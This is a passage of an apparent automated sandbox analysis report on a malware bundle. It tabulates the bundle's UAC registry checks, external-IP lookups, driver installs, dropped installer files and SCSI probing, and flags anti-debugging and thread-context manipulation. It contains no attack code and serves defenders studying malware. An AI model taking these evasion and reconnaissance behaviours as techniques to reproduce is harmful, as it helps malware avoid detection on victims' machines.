| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\B25D.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\JDkxd0BisQ3uX9WNGecGxdCL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\ProgramData\Systemd\Database.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156}\SET2AA3.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156} | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156}\tap0901.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156}\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156}\SET2A91.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156}\oemvista.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156}\SET2AA2.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\drvstore.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156}\SET2A91.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156}\SET2AA2.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{4667c037-9d39-1a4f-a437-4e3a4b4be156}\SET2AA3.tmp | C:\Windows\system32\DrvInst.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-1HU2J.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-MB3CH.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\UltraMediaBurner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-BMVEP.tmp\ultramediaburner.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-7DGD4.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-BVG3G.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\d.jfm | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\libass.dll | C:\Users\Admin\AppData\Local\Temp\is-GDHQN.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-K1KJI.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-55VDM.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\unins000.msg | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\ipseccmd.exe | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-5VR27.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\libMaskVPN.dll | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-ROHGV.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\Uninstall.ini | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-4FDJ6.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-ARPGM.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\Hetysholoxa.exe.config | C:\Users\Admin\AppData\Local\Temp\is-6JNGI.tmp\ultradumnibour.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-ASHLO.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-TIAD1.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\javaw.exe | C:\Users\Admin\AppData\Local\Temp\is-GDHQN.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-M4UIH.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-U0UGB.tmp | C:\Users\Admin\AppData\Local\Temp\is-GDHQN.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-KKD6D.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-CVSOK.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-44DPS.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\Hetysholoxa.exe | C:\Users\Admin\AppData\Local\Temp\is-6JNGI.tmp\ultradumnibour.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-0EB7M.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Company\NewProduct\d | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-5723U.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-FASEI.tmp | C:\Users\Admin\AppData\Local\Temp\is-GDHQN.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\tunnle.exe | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-KRJH5.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Sofware IN LLC\QtProfiler.exe | C:\Users\Admin\AppData\Local\Temp\is-GDHQN.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-BJN6M.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-5CJCO.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-37JL7.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win764\is-A4KI5.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-45M9J.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-7ME2P.tmp | C:\Users\Admin\AppData\Local\Temp\is-GDHQN.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\customer3.exe | C:\Users\Admin\Documents\u9pzYiYnNByA7uyFsDrbpZcm.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-GQSSM.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\MaskVPN\MaskVPN.exe | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp32\is-L0IB1.tmp | C:\Users\Admin\AppData\Local\Temp\is-8A9HJ.tmp\Setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe | C:\Users\Admin\AppData\Local\Temp\is-TMUS2.tmp\Setup.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\SysWOW64\WerFault.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF5ED3D4B595CB9760.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f769249.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA8EE.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF06CBBDA2F860CFFF.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF4E11D7E6A71AB828.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\inf\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFEB4422B23B80AE14.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIEA2E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF200.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI1B66.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2059.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI471.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3886.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Installer\f769249.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIECA0.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFBB5.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI14FC.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI1E26.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI6791.tmp | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | C:\Windows\system32\svchost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\OxoehhQCj1yPmBfFQnSfhg0U.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Service | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
